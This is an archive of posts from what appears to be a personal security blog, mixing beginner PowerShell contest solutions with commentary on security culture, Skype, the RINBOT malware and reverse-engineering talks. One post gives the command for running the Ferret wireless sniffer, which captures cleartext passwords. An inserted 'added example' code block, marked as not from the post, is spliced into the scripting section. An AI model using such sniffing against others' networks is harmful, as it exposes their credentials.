Advanced Event 6 wanted a nicely formatted 75-column block of text. I really didn't know what to do here.
.: on remarkable customer service
It seems that whenever Joel posts a significant new article on his site, I end up copying the link from here, almost like a little RSS/mirror service. I think it's because this guy just "gets it." I've yet to see bad advice from him and everything he says is majorly refreshing and awesome. I could gladly work in a company like that, even adjusting my career path for a company like the one he runs.

Anyway, I'm gushing, which is not something I usually do. Joel talks this time about remarkable Customer Service.
.: sobering security
I saw this fly past on the Security Focus security-basics mailing list from an anonymous poster. I simply wanted to capture the moment here and let it sink in.
I work for one of the biggest universities in the US and they barely care about security, so I think you may be in for an uphill battle. I've been trying for years without any luck; the same story comes back from management over and over, "we never had any security problems so why should we invest money to prevent them" and that's a direct quote from more than one person in management.
.: oh to be on the same page
"One whose upper and lower ranks have the same desires will be victorious." The Art of War, Chapter 3: Planning the Attack

It is frustrating (both for techs and for management) when they cannot agree on their goals for security. Unless they can agree, they won't succeed.
.: winter scripting games: events 7 and 8
This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

I've found my creativity stimulated quite a lot by these games. Also, since I've started doing these games, I think this group of 4 events was the easiest so far. The first few might have been easy, but they required more effort since those were my first looks at PowerShell at all. By the way, MoW is also posting his responses and I must say, his code is far more elegant and experienced than mine. It's awesome!

Beginner Event 7 involves taking a bit of code that throws an error and managing that error: first, prevent the ugly error from displaying to the user, and then also handle the error later. This is a good Beginner topic and one of those things that often gets overlooked but is very necessary for good scripting and coding: error handling.

$error.clear()
$erroractionpreference = "SilentlyContinue"

######## START UNCHANGED CODE #########

$a = 5
$b = 6
$c = "seven"
$d = 8

$x = $a + $b
$x = $x + $c
$x = $x + $d

$x

######## END UNCHANGED CODE #########

if ($error.Count -gt 0)
{ Write-Host "An error has occurred." }

# This would display the errors, but not required
# for ($i=0;$i -lt $error.Count;$i++)
# { $error[$i] }

Beginner Event 8 is a "simple" game of jacks. This is another excellent Beginner event in that it focuses on something rather basic but necessary: nested loops. This is simply about thinking through the logic of the problem, and then setting up counters and loops to achieve the answer.

$jacksingame = 10
$i = 1
$bouncestotal = 0
$jackspickedup = 0

do {
$jacks = 10
$bounces = 0

# Round $i: each bounce picks up $i jacks, so count bounces until all 10 are gone.
do { $bounces++;$bouncestotal++;$jacks -= ($i * 1); } until ($jacks -le 0)

$jackspickedup += 10
$i++
} until ($i -gt $jacksingame)

Write-Host "Total jacks: $jackspickedup"
Write-Host "Total pick-ups: $bouncestotal"

Advanced Event 7 wants a text file read, encrypted, and then also optionally decrypted using arguments when starting the script. Since I am still smarting from the rather nasty Beginner challenge to convert text to hex and back to text again, I decided to yoink that code, drop the hex part, and use the decimal values. Then increment the values by one before converting back into ASCII. Instant, if weak, encryption! (I also thought about using a simple cipher substitution or ROT13 Switch, but decided this was easier.)

if ($args[0] -eq "e") {

# $input is an automatic variable in PowerShell, so the file text gets its own name.
$plain = [string]::join([environment]::newline, (get-content -path Alice2.txt))
$e = ""
for($i=0;$i -lt $plain.length;$i++)
{
[int[]]$a = $a + [int] $plain[$i]
$a[$i] += 1                    # shift every character code up by one
$e = $e + [char] $a[$i]
}

$encodedfile = New-Item -type file "Encoded.txt" -Force
Set-Content Encoded.txt $e

} elseif ($args[0] -eq "d") {

if (Test-Path Encoded.txt) {

$cipher = [string]::join([environment]::newline, (get-content -path Encoded.txt))
$y = ""
for($i=0;$i -lt $cipher.length;$i++)
{
[int[]]$x = $x + [int] $cipher[$i]
$x[$i] -= 1                    # shift each code back down by one
$y = $y + [char] $x[$i]
}

$y

} else { Write-Host "Encoded.txt not found. You probably need to use argument 'e' first to encode a file."}

} else { Write-Host "Please provide an argument 'e' (to encode) or 'd' (to decode) " }

Advanced Event 8 provided small pieces of code with the question: "Is this a valid piece of code?" Not too hard and kinda fun! I won't post my answers here, since there's nothing really novel in the answers.
.: are tools making us dumber?
There are a few blogs that I read regularly that are not strictly tech/infosec type blogs. Creating Passionate Users is a bit of a cheat since Kathy Sierra has a technical background and does talk about some technical things. My reason for mentioning this is her post about whether tools are making us dumber.

We call people dumbed down by tools "script kiddies." They are the people who utilize other people's tools without knowing what is really going on underneath the hood. Tracert is composed of pings? Teardrops just make computers blue screen, right?

You can then push this up to the enterprise as well. I use an IPS/IDS "alert-based" system from a major vendor of security products. Sadly, the appliance takes out all the ability to trace sessions and capture/read packets and interpret one's own attacks. If the appliance is doing something weird, someone without that additional knowledge is really pretty lost and the appliance loses a lot of value.
.: securiteam: home router remote access
I see SecuriTeam has gotten a facelift recently, nice! (One of the downsides to running an RSS reader is you lose the visual connection with the site...) The post that drew me there was a post from Sid detailing his discovery that his home router was essentially backdoored.

The takeaways from this article include: change your admin password on the router; be at least a little bit knowledgeable about the router; scan your home connection remotely every now and then, even if that means nmapping yourself from a local hotspot. ISPs really should not do something like this. While it at first seems like a good idea, all it takes is one curious person to get that password and suddenly that opens up the digital worlds of every other user on the ISP. I know not everyone has the aptitude to do such tests, but there is little excuse for those of us who do.
.: winter scripting games: events 9 and 10
This post is just about my time with PowerShell for the 2007 Winter Scripting Games. If you have no interest, I certainly won't be upset if you skip this post. I'm posting only because this will mark my first exposure to PowerShell.

So, these are the final scripting games events! I'm actually enthused because I finished all four of these over 24 hours early and am very happy with the results.

Beginner event 9 wanted a list to be read and only certain values displayed from those lists. I ended up using the same code for each list. I assumed the first entry was a value I always wanted, and then any entry after a blank line was another one that I wanted.
$firstline = 1
$names = @()

foreach ($i in Get-Content List.txt){
if ($firstline -eq 1){$names+=$i;$firstline=0}else { }
if ($switch){$names+=$i;$switch=0}else { }
if($i){ }else {$switch=1}
}
Write-Host "---------------"
Write-Host "List.txt names:"
$names


$firstline = 1
$names = @()

foreach ($i in Get-Content List2.txt){
if ($firstline -eq 1){$names+=$i;$firstline=0}else { }
if ($switch){$names+=$i;$switch=0}else { }
if($i){ }else { $switch=1 }
}
Write-Host "---------------"
Write-Host "List2.txt names:"
$names
Write-Host "---------------"

Beginner event 10 only wanted to have a bunch of terms unscrambled. This was rather easy and not even worth posting the scores here.

Advanced event 9 was an awesome little challenge. There were really two parts to this for me. First, figure out how to create a string and then force it to be valued like an expression. Eventually someone on IRC clued me into "invoke-expression" which was exactly what I was looking for. Second, figure out how to iterate through all 4 signs in all 4 places in the challenge equation. Basically, 4 nested loops. Here's the surprisingly short code:

$signs = "+","-","*","/"

foreach($a in $signs){
foreach($b in $signs){
foreach($c in $signs){
foreach($d in $signs){

$equation += "12"+$a+"8"+$b+"4"+$c+"2"+$d+"9"
$guess = invoke-expression $equation

if($guess -eq 23){Write-Host "The answer is $equation";exit}else { }

$equation = ""
}
}
}
}
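An added example, not from the post or from MoW: the same brute force without invoke-expression. Handing a built-up string to invoke-expression executes whatever the string contains, so a table of operator script blocks is the safer habit once any piece of that string can come from outside the script.

```powershell
# Added example, not the post's own code: search 12 ? 8 ? 4 ? 2 ? 9 = 23 over the
# four operators without Invoke-Expression. Only these four script blocks can run,
# whatever text the operator list is built from.
$ops = @{
    '+' = { param($l, $r) $l + $r }
    '-' = { param($l, $r) $l - $r }
    '*' = { param($l, $r) $l * $r }
    '/' = { param($l, $r) $l / $r }
}

function Evaluate-Arithmetic {
    param([double[]]$Numbers, [string[]]$Operators)
    # Work on mutable copies so solved terms can collapse in place.
    $nums = New-Object System.Collections.ArrayList
    $nums.AddRange($Numbers)
    $opsLeft = New-Object System.Collections.ArrayList
    $opsLeft.AddRange($Operators)
    # Two passes give the precedence Invoke-Expression would apply:
    # * and / first (left to right), then + and -.
    $passes = @('*', '/'), @('+', '-')
    foreach ($pass in $passes) {
        $k = 0
        while ($k -lt $opsLeft.Count) {
            if ($pass -contains $opsLeft[$k]) {
                $nums[$k] = & $ops[$opsLeft[$k]] $nums[$k] $nums[$k+1]
                $nums.RemoveAt($k + 1)
                $opsLeft.RemoveAt($k)
            } else {
                $k++
            }
        }
    }
    return $nums[0]
}

$signs = '+', '-', '*', '/'
$numbers = 12, 8, 4, 2, 9
$target = 23
$solutions = @()
foreach ($a in $signs) {
    foreach ($b in $signs) {
        foreach ($c in $signs) {
            foreach ($d in $signs) {
                $combo = $a, $b, $c, $d
                if ((Evaluate-Arithmetic $numbers $combo) -eq $target) {
                    $solutions += "12 $a 8 $b 4 $c 2 $d 9 = $target"
                }
            }
        }
    }
}
$solutions
```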

Advanced event 10 introduced something new for me: colors! Holy crap, I can change the display colors! Now THIS can get fun! I also had to learn how to create a random number generator and be able to pull items out of an array without duplicating any. I think there were a number of ways to do this, but this method was the one I chose to tackle. Thankfully, it all worked out!

[collections.arraylist]$a = 1..20
# Deal the 20 numbers out in random order: the begin block creates one generator,
# then each step picks a random index, emits that item and removes it so nothing repeats.
# (Named $rand rather than $R: PowerShell variables are case-insensitive, so $R is $r.)
$r = $a |% {$rand = new-object random}{$rand.next(0,$a.count) |%{$a[$_];$a.removeat($_)}}
for($i=0; $i -lt $r.count;$i++){
if ($r[$i] -le 5){$r[$i] = "BLUE"}
elseif($r[$i] -le 10){$r[$i] = "GREEN"}
elseif($r[$i] -le 15){$r[$i] = "RED"}
elseif($r[$i] -le 20){$r[$i] = "YELLOW"}
else {Write-Host "Error: round $i value $($r[$i])"}
}

$score = 0

for($i=0; $i -lt $r.count;$i++){

$guess = Read-Host "Guess the next color (R, B, G, or Y)"

Switch($guess)
{
"R"{$guess = "RED"}
"B"{$guess = "BLUE"}
"Y"{$guess = "YELLOW"}
"G"{$guess = "GREEN"}
}

Write-Host $r[$i] -fore $r[$i]

if ($guess -eq $r[$i]){Write-Host "yay!";$score++}
else {Write-Host "boo!"}

$total++
Write-Host "You have gotten $score out of $total correct."
}

if ($score -ge 6){ Write-Host "YAY! You win teh prize! You have ESP!" -back "magenta" -fore "DarkBlue" }
else { Write-Host "boo! you lose! your guesses suck!"}

Scores to Advanced and Beginner divisions are posted.
.: more on tools, automation, and whether they are making us dumber
This post builds off my previous post on whether tools are making us dumber (a post referencing a recent Kathy Sierra post). Marcin threw me over a link to someone else who noticed that article.

Luke Kanies provides a few quotes in what at first seems like a nimble article but really is kinda confusing, like cut-backs while running in sand. Either way, I thought about these a lot:
Unfortunately, I’ve seen too many sysadmins fall in love with the tedium of knowing all the little bits of all the systems they manage and not worry so much about understanding the higher-level nature of their jobs.
I like this quote and I kind of agree. However, a case can be made that an exception to this "heightening view" approach (which, incidentally, is natural as one proceeds through business and technical experience) is the realm of security. Yes, we need to look at the high level and we need to worry less about every little thing, but it is those dozens of little things that a skilled or even just an opportunistic attacker can exploit. It is also those little bits that can give away subtle attacks or problems. We've seen time and again that the more automated we become in security, the more we can become susceptible to chinks in our armor that we're not seeing because we're viewing from too high up.
To those sysadmins who are afraid of automating themselves out of a job, you should ask yourself where your value is: Is it the tedious parts, or is it the understanding behind the job?
I picked this out because I just wanted to remind myself and anyone else that the purpose of IT and technology in business anyway is to automate. If we're not always trying to enable business, create business, or automate business, we're not really doing our tasks. Sometimes that is hard, but a high level view of IT is automation.

In the end, I like the article because I truly think a case can be made for keeping one's head in the trenches of IT and also for climbing up into the scaffolding to get a new perspective. There are a lot of different and equally correct opinions and viewpoints in IT and while some see that as weakness and lack of moving forward as a unit, I see it as a healthy (hopefully respectful) heterogeneity. (Yes, I sometimes make up words, but if you know what heterogeneous means, you get it.) :)
.: counter hack reloaded
I just finished (finally!) Counter Hack Reloaded by Ed Skoudis. I really love Skoudis' style and sometimes informal tone in the way he writes. It really works for a book that is really meant to be read start to finish (as opposed to a hit-and-miss tools/attack-defense or reference book).

The book presents a number of new things to me, but the most memorable parts dealt with some of the more advanced techniques such as various covert channel attacks that I've really not heard much about. Of particular interest when I hit this part last autumn, Skoudis does maybe the best job I've read on describing buffer overflow details. I've read numerous other descriptions in the past and kinda knew what was going on, but for some reason Skoudis lit that little light bulb over my head on his description. Granted, I don't see myself becoming a memory-shifting expert any time soon, but at least I really understand the details now.

Overall, this is a must-read for any IT professional with any interest in security, and should be mandatory for all security persons. It is one of the best books I've read in my geek collection. Some of it might be elementary such as DNS digging and nmap scanning, but there are plenty of more advanced techniques that you just don't find in other similar books.
.: a tale of two security viewpoints
This was recently posted to a mailing list I am on in response to someone inquiring about how to proceed with security in an environment that is not really open to security. I thought this was an amazingly well-written summary of what too many other IT and security people go through. I'm sure I'll see plenty more of this in my career also, and it helps to recognize it early before spending futile years taking it personally when things don't work out (I take my work personally). Reprinted with permission:
I was hired for Network Security by individuals it now seems really did not understand the concept. When I initially arrived, the attitude was that I would "secure" whatever project or action was taken. It took a while to get them to understand that I needed to be a proactive, included member of things from inception.

  • Not only do I report to a Network Ops manager, this person - who on one hand admits they have no security background - sets the agenda for how I go about addressing this area. There are constant conflicts, up to and including my recommendations and opinions sometimes not being heard because they are perceived as unnecessary, unrealistic, or obstructing progress.

  • I am the only person dedicated to network security. That is not necessarily a huge issue. The larger issue is that the perception is that I alone should somehow be able to do everything, and I should be able to do everything by myself. The last major virus outbreak we experienced, after a couple of days it became obvious that I could not scan EVERY cpu by myself. However, I was turned down when I asked for help (Our helpdesk was allowed to low-priority my CPU scan tickets.) And in the end, management was thoroughly displeased with how the whole incident was handled (took too long, users were upset, etc). Meanwhile, I was a wreck from having worked about 40 hours in a three-day period. ... An unwinnable situation.

  • The entire IT dept is nearly completely reactionary. We have no CIO, and our IT leader is not seen as an equal by the other top-level executives. Basically, whatever requests or whims other departments want, we wind up trying to accommodate. Even if the wishes are counter-productive, redundant or will adversely affect the network.

  • IT does not seem to "talk" to the user community. It is almost like the goal is to allow the users to do whatever they want, while IT does everything for them. Which would maybe be okay, except there is a culture of allowing the users to do darn near ANYTHING they want. I see a real lack of guidance coming from our IT department.

I am leaving this position. I have been unable to figure out how to simultaneously write policies (there are none), plan strategy, fight the day-to-day fires and perform proactive, pre-emptive research and analysis by myself within a reasonable timeframe to keep up with the ever growing needs of the environment. Things fall through the cracks, mistakes get made. Although some colleagues are beginning to understand that they, too, must become more security conscious in the way they approach networking, still security overall takes a back seat. No one wants to tell the big bosses "no", that some of what they want is not feasible at the moment, or that some things will be delayed because we are trying to do them correctly now. Or tell them the real cost of implementing the latest whiz-bang technology without shoring up the holes that currently exist. -- Definitely, no one wants to say that mistakes were made in the past, and now we have to correct them in order to get better and move on.

Francois [ed: the original poster], I feel for you. I, too, know that not all environments have to be like what you and I have (are) going through. The choice for me is to leave. I hope that you will be able to make your management understand that security is not one person's job. Rather, it is a way of thinking and doing business. To paraphrase the poster, network security is not a destination - it is a journey.
I hope the poster finds a much better position to apply their obvious talents.
.: winter scripting games: redux
So my time with the winter scripting games is pretty much over. I just have to ask why I scored 0 on one event (I think the email submission may have line-wrapped something weird) and give my thanks and positive feedback to the organizers.

Overall, I exceeded my goals. I wanted to give a best effort towards half the Advanced division and get most of the Beginner division correct. I ended up 95/100 in the Beginner division and 90/100 in the Advanced (assuming my one score gets corrected). And I am proud to say that the two I missed were definitely tricky for someone who first installed PowerShell only days before the start of competition.

I have documented my scripting games answers and some links in my wiki (must...use...wiki...more). Thankfully, it just so happens that we're looking to script more at work. Only one guy had previously had any experience scripting, so this makes great sense to include me as a second resource and backup. I plan to continue learning more about PowerShell and try to use it as much as possible. I just purchased Payette's book PowerShell in Action and plan to continue to learn stuff on irc.freenode.net's #powershell channel.
.: learn how to reinstall your system
I have this list of things that home users can do to be more secure. One thing I might try to fit in there is to suggest that home users figure out how to install their Operating System.

Now, this may not be about trying to teach someone the nuances of a reinstallation, especially that they should have their data backed up, accounts and software licensing information stored separately, and a list of everything they had installed or need kept available for a reinstall. However, I do believe that one problem people have with working on their computer is a simple lack of exposure to the reinstall process (or someone/someplace that can do it for them). A reinstall is not typically something people do since their computers come from Dell or Gateway which happily does the work pre-ship. But the Internet can become a safer place once people get used to the process of a reinstall or where to turn for help if they decide to do a full reinstall.

I might consider this a half-step since it might be one of the scariest things the average person will do with their computer. Trust me, people are more scared about a reinstall than they typically are about installing all sorts of random programs on their system. Sometimes they are completely worried about losing their years' worth of settings and small tweaks and the position of their desktop icons. However, regularly performing an install or just knowing that it is not all that bad an ordeal will help in being smarter about their computer use. If nothing else, befriend a local support guy, your local Geek Squad, or become familiar with the ability of your provided Tech Support.

I liken this to having a backup solution in place. But how do you know the backup solution is working or how much it is backing up or how to work a restore in the event of an emergency if you've never done a restore from it? An emergency is not the best time to do a restore for the first time.
.: be prepared - don't be the last one to the battlefield
Whoever occupies the battleground first and awaits the enemy will be at ease; whoever occupies the battleground afterward and must race to the conflict will be fatigued. Thus one who excels at warfare compels men and is not compelled by other men. -The Art of War, Chapter 6: Emptiness and Fullness

I expect Andy to post this up as well, since I think it can definitely be one of those rallying (or frustration) cries we have in security...and we both have the same calendar sitting on our desks!

I wasn't sure about including that last line. The first two lines resonate throughout IT security from testing/planning your disaster recovery plans to being ready to detect and mitigate incidents to simply making sure logs are scanned for the first sign of an enemy. The last line still makes sense as we sometimes do need to dig our heels into the ground and make sure our management knows the score and the risks (properly) so they can be compelled by us to be prepared...otherwise they are compelling us into letting go of the preparedness.

Kurt's comment put that last line into a better light for me and totally makes sense. No wonder it felt a little "off" earlier! Thanks!
.: security does not have to be an imbalanced seesaw
I had planned out a couple posts. One was going to explain in no unclear terms that user training is broken and won't help. The follow-up was going to be the opposite in how technology will not ever protect us without end-user training.

I decided to put that on hold and maybe not even post it, but I did want to blab about something else I see in the IT and security communities. I see a lot of very polar opinions on how things should be. You have user training versus technological controls. ROI vs insurance. Business skills vs technical skills. Full-disclosure vs alternatives in either direction. Black hat vs white hat. Perimeter is dead vs perimeter is important.

The bottom line? All of these approaches are correct and all should be practiced to some extent. Just like all those diet fads, stick solely to one for a long period of time and you'll have new problems. But if you took the basic concepts from many, you can end up with a very effective approach.

There is a place for each extreme, but they are all necessary and need to be balanced. There are also people who, for instance, can be mired completely in the technical realms and leave the businesspeak to their bosses and not only be successful personally, but help drive their company to success. The balance doesn't have to be in each individual, but a department can achieve balance with imbalanced parts. Then again, even imbalance will work depending on the corporate culture, needs, and outside influences.
.: rinbot-delbot-sdbot drama
CNN was kind enough to post an amazingly oddly placed article about the latest RINBOT/DELBOT/SDBOT variant.

This is awesome because now what is otherwise a non-event is becoming something mgmt and normal users are asking me (us) about. Yay! So here's some information to help point you in the right direction in case you get questioned.

As far as I know, only Symantec has this malware variant on their radar. Everyone else seems to be considering this one a minor blip on the radar.

In short, this malware strain is simply an infector for your run-of-the-mill botnet and is not a new threat. Variants of this bot have been around for over a year, and this is the 9th (I believe) variant. The vulnerabilities this malware attacks have had available patches for months or longer.

RINBOT - Symantec/Trend name
DELBOT - Sophos name
SDBOT - McAfee name

This new variant spreads in three major fashions:
- Windows Server Service vulnerability (patched in August 2006)
- Symantec AV Client Vulnerability patched late last year
- IPC$ shares with common or no security
- some variants use email attachments

This is not a really new threat. You don't have much to worry about if you do not use Symantec applications and you have patched your servers. Obviously, you also want inbound ports stopped on your perimeter. I won't spam more links. The ones above should be sufficient.
.: some tuesday thoughts - network versus application security
There is a question that seems to be boiling around, both now and in the past year or so. Where is security headed? Is security moving to the network/switches? Is security moving to the application and away from the OS? Is it moving to protect data at rest and in transit? End-point security? Or just to meet compliance?

These are pretty big questions because they can shape the direction of a company for the next 5 years. I wish I had more answers beyond, "If you take any one approach, you may leave yourself weak in the others. If the whole industry does this, we'll just have a wavering trend where for 10 years the network solidifies and gives way to applications and then 10 years where applications get hardened and network progress breaks down." You can even push that out to technology vs training.

Just some interesting, largely rhetorical questions I keep in mind lately and would love to see discussed at length in the community.
.: there be ferrets running amok on the wireless nets
The news of this tool is making the rounds, so I thought I'd post quick. Errata Security has partially released a tool called Ferret which purports to show what all is being leaked through your wireless connection every time you use it.

How do you run it? Download the file and pull out the pre-compiled ferret.exe. Run it from a command line without options and it will tell you your network interfaces. Pick your interface and run 'ferret.exe -i#' to use that interface. Incidentally, you can use a wired or wireless connection if you'd like. (You might need winpcap, but I don't know since I always have it installed anyway.)

The bottom line is this current tool is not as revolutionary as some news and mailing lists are stating. It is really just a sniffer that is only looking for specific data including broadcasts and some application data; things that anyone running any sniffer would be looking for (such as cleartext IMs, passwords, usernames, sites you visit...). Since this is meant for wireless networks, this stuff is typically "broadcast" anyway, due to the medium.

The real beauty will be in the next part of Ferret that they release, the visual/correlating tool.

Check it out, but if you're used to looking at packet captures, don't expect to be wowed right now.
.: don't be that guy who doesn't have to follow policy
If leaders can be humane and just, sharing both the gains and the troubles of the people, then the troops will be loyal and naturally identify with the interests of the leadership. -The Art of War, Chapter 1: On Assessment.

There are many ways to look at this quote. In regards to IT security, this immediately made me think about one of the biggest frustrations that senior management can give us: being above the policies. It is highly frustrating when people in leadership positions try to be above the security measures put in place due to their station or ego.

Likewise, as IT professionals we sometimes do have certain liberties and access above and beyond some policies, especially in testing or lab environments or on assessment systems, but by and large we also need to try our darnedest to not be exceptions.
    .: more skype reports
    I'm in a bitchy mood today and want to rant on something. This article from ComputerWorld about "How dangerous is Skype" came in at the wrong time.

    First, let me just say that I am mixed in my feelings about IM and Skype in a corporate environment. I think this is a trend that, in the long run, will be a losing battle for corporate IT and security. IM is just part of our culture and life, and embracing technology for the betterment of people and the company does have weight. That's not to say I want Skype in corp nets, but I can sit on either side of the fence comfortably. Encrypted network traffic is also part of our future, and we need to start dealing with it now instead of whining about it.

    Here is my take on some of the "Skype FUD" or myths that Michael Gough tackles in his article.

    Myth No. 1: Skype uses a lot of bandwidth on my network. Great, I'm glad that Michael Gough tells me that a voice call takes 30kbit/sec on my network. That'd be great if I allowed only one call at a time. Scale that out with your users and get back to me.

    Myth No. 2: Any computer can be a Supernode. This is one of those beefs with Skype that has been around a long time, and I hated it because it's not an issue in almost every corporate network. Michael is correct, you can't be a supernode if you're behind a NAT. But, that does mean, as Michael mentioned earlier, that your communications will be weirdly routed through someone else. Annoying, but really a non-issue in any NAT situation. (This may become a huge problem in IPv6 or it may become a big problem for Skype itself if fewer and fewer supernodes are available as people hide behind NAT or slow connections.) So, I agree with Michael: this is a myth.

    Myth No. 3: Skype is susceptible to IM worms and viruses. Myth? What the crap? Is this the Apple defense about "well other IM apps have had lots and Skype none so that means security?" Yes, in part it is although he oddly mixes actual client vulnerabilities with malware sent via other IMs via file transfer. That inflates his "other IMs" numbers and keeps Skype's really low. *sigh*

    He also mentions that file transfer can be turned off (which it can be on other IM apps too) and files can be scanned by anti-virus (other IM apps as well). So, I'm not sure what he's trying to say here, but I can illustrate that Skype is no different from other IM apps that have been hit with his 1,000+ issues.

    I also challenge that "the main vulnerability of IM applications is their file transfer feature." I conjecture that links to malicious sites sent via IM is more dangerous. This "myth" from Michael is completely wrong, and Skype is absolutely no different from any other IM program.

    Myth No. 4: Skype is hard to stop on my network. This really is a half-myth but I slightly dislike how Michael Gough tackles it. From the start, Skype was not hard to defeat: just block it from being able to authenticate and logon the user. Easy. I'm surprised he never mentions this; maybe this has changed. I also dislike that he attempts to defend the network by controlling the OS inventory and OS outbound connections. I don't think this is the best approach, and Skype should be able to be blocked on the network by the network alone. I will admit, however, that stopping a P2P app on a network presents problems, so in a way, Michael's approach is still solid advice. The real issue, though, is Skype should not have to be that hard to block on the layers it uses.

    Myth No. 5: Skype is encrypted, so I can't archive IM messages. This is a two-headed dragon and I'm surprised Michael Gough attempted to tackle this in either direction as a myth. Instead, he fumbles the ball:
    This one's not really a myth. Skype sessions are encrypted, so yes, you can't capture or archive Skype communications. The same is true of many IM applications, though, so it's not less secure than other IM programs that can use encryption.
    Bah! Yes, Skype is encrypted so you can't archive it off the wire, but I'm not sure what settings and apps he uses to say that other IM programs are the same. I can sit down and monitor and grab IMs off the wire on every other popular IM program with default settings. Skype has this feature enabled by default whereas other IMs do not. In fact, I can turn off this setting on every IM program, but with Skype I absolutely cannot. Also, for an article that itself says it is geared to corporate networks as well as individuals, he ignores any issues with HIPAA or compliance that requires logging/archiving/monitoring of data egress via IM. For home users, this is an awesome feature to protect privacy. But this is maybe the biggest hurdle Skype has been facing when it comes to corporate use.

    Just to add one more item. Until Skype settings can be controlled centrally, that is another hole in the argument for Skype in the corporate network. Let me centrally control and force settings, file transfer allowances, and yes, adjust encryption such that I can monitor data egress (note that I don't necessarily want it cleartext). There are other considerations, but that's all I'll throw out for now. :)
    .: owning snort
    Just posting a quick pair of links in case anyone is interested in reading about creating an exploit/buffer overflow. Trirat Puttaraksa discusses a Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow. Part 1 is a DoS condition and part 2 goes into actual code execution. Very interesting, although beyond my abilities for now. Browse the rest of his blog for even more dissections.
    .: silica
    Dave Aitel posted this to his mailing list today:
    Next week is Shmoocon - and I'll be there with whatever the latest build of SILICA is in my pocket. Feel free to pull me aside for a quick demo.
    Man, Silica is about as expensive as a high class hooker, and it looks as good too! It's sexy as all hell, and if I ever came up on a few grand to drop on a toy, I'd seriously think about this one (assuming I could get properly vetted). If any of you are at Shmoocon and see him (or maybe his wife too?) around, totally ask to see Silica in action.
    .: possibly the biggest battle in security
    It might be the hardest battle you will face as a security professional. It might cause the most grief, frustration, and exasperation. No, it's not trying to make sure all your Windows servers perform smoothly. It's not trying to fend off the dozen vendor calls that come in every day. It's not even an entire weekend wasted because of some unknown glitch caused by someone else that brings down critical systems. And it's not quite the often futile attempts to deter the insider attacks.

    Quite possibly the hardest battle we will face is the battle to change the culture of a business from one that trusts everyone, particularly those "in the family," to one that practices diligent security. Ever try to tell your Help Desk personnel that they should not ask for user passwords when doing some work over the user's lunch hour so as not to disrupt their normal work day? Those same desktop people who typically are evaluated based on their customer service to those users? I've been in those shoes and I fully empathize. As a support person, you want to be able to bend over backwards if an important user needs you to; not to give a look of regret and explain that "security process" is tying their hands a bit and inconveniencing everyone.

    Have you ever seen the look on senior management's and human resources' faces when you tell them they need to operate in a way where they don't necessarily trust their own people? There's not much more they brush off quite so quickly and easily than claims that their own people may be a threat, even an accidental one.

    This battle can be easy in some compan...no. It can be easy in some organizational cultures. The military has ingrained security process very deeply. Larger corps are also a bit more successful in steering culture, especially those that might have real reason to hide things (think Boeing, Lockheed, or Microsoft, e.g.).

    But the rest of us...yeah, the rest of us someday have to face those cultural battles where we should not be handing over passwords or being accommodating to persons whose username we may have seen but have never yet met when they ask for something beyond their typical level of access. Is this a new direction for the company that her department is shifting a bit and we have to compensate, or is this an attempt to get access to something she shouldn't have? If we ask the manager to verify and/or authorize, will they just take the path of least resistance and kneejerk a "yeah sure, I approve" response? What kind of look do you get when you explain that perhaps their manager and then the data owner both need to approve access? Is it acceptance or a flash of genuine annoyance that you know will be spread around to anyone willing to hear?

    And these are not things that are easily overcome with training and user education. It is one thing to educate a user about something they didn't know previously and are open and receptive to the information. But it is another side of training altogether to tackle culture and paradigm shifts. This typically takes a lot of time and a lot of repeated training towards this aim (or just force it with technology and a big clue banana).

    I admit, some places in this country might be easier to adjust attitude than Des Moines, Iowa where I live and work. We're still a very open community and trust and customer service are pretty natural. Even "trust but verify" is a difficult adjustment. When does the line get crossed between being a helpful steward to a company versus practicing a dangerous habit?

    Just like a courteous security guard who tends to recognize faces regularly, all it takes is one person out of 10,000 who walk by in a year to bury the company or disclose information that emboldens a competitor, jeopardizes a nation, and affects the livelihoods of your fellow workers. Just one person that is allowed to pass because he looks familiar (he was fired last week against his will), is dressed like a VIP, and looks like he'll pin your manager's ass to the wall if you inconvenience him, can be The One.

    While my team has yet to convey a culture shift in the people that matter when it comes to security and customer service, at least we are still trying. We continue to implement technology to not only help cover the company's ass in case our paranoia becomes reality, but we also try to maintain a foundation that if the direction of mgmt changes, we can quickly adjust and add on security as our openings allow.

    (This post was partially inspired by Scott Wright's recent post about the insider threat.)
    .: recon 2006 presentations
    In case you missed this, the REcon 2006 presentation videos are available.

    REcon is a Reverse Engineering Conference in Montreal. If you're in that area and consider yourself part of the "in" crowd (or want to be) with reversing, you might want to check this out. Since I'm not exactly a reverser, I can't attest to their quality. Perhaps the presentations might not be worth it, but the socializing and drinks with other geeks might be worth it.

    I've watched the presentation by David "h1kari" Hulton on Breaking Wireless... Faster where he talks about FPGA and speeding up the cracking process (dramatically!). Of course, the chips themselves are dramatically costly, hehe. The demos don't go over quite as smoothly as they could, but still a solid personality and presentation on wireless attacking by the author of coWPAtty.
    .: locating a wireless user
    For once I am posting a question since it is something I have yet to be able to answer properly, but the bug keeps itching at me to answer it.
    How do you physically locate a wireless user? Pretend you have a wireless network and someone has been getting in. Other than getting lucky and walking around, how do you locate someone efficiently?
    Now, I know expensive and expansive solutions exist for larger campus-type wireless implementations to locate users using information on their signal strength and triangulation between overlapping wireless coverage. But what about for your average techie joe who wants to do this? Is there any software and non-expensive hardware that can help?

    I also know that I could attempt attacks against a laptop and see if I can turn on an annoying WAV file and increase the sound...but that's a bit too intrusive and variable.

    I'll likely troll a few forums and IRC chans looking for this information over the course of the next few months as I'd really like to answer it.
    .: would you rate an ids as an expert level application?
    I liked this post by Curphey in relation to the SourceFire IPO. In fact, I like it because of how it portrays IDS/IPS and the typical installation.
    [1:20:17 AM] XXXX-XXXX says: I’ve never been at a company where i’ve heard them say they were happy with their sourcefire deployment or for that matter… convinced me they were glad they made the purchase
    [1:21:58 AM] XXXX-XXXX says: The security departments gets this new toy, they quickly figure out they dont have the time to babysit it (or configure it properly) then they outsource the monitoring
    [1:23:02 AM] XXXX-XXXX says: once the monitoring company gets it.. they detune it as much as possible.
    [1:24:44 AM] XXXX-XXXX says: What I see happening is “what do you mean this IPS might stop legit traffic? well lets just run it in IDS mode then”
    [1:24:52 AM] XXXX-XXXX says: and after talking to XXXX-XXXX sales engineers
    [1:25:02 AM] XXXX-XXXX says: 90% of XXXX-XXXX deployments are in IDS mode only
    [1:25:40 AM] XXXX-XXXX says: Less then 5% of XXXX-XXXX deployments take advantage of the SSL decryption and analyze features.
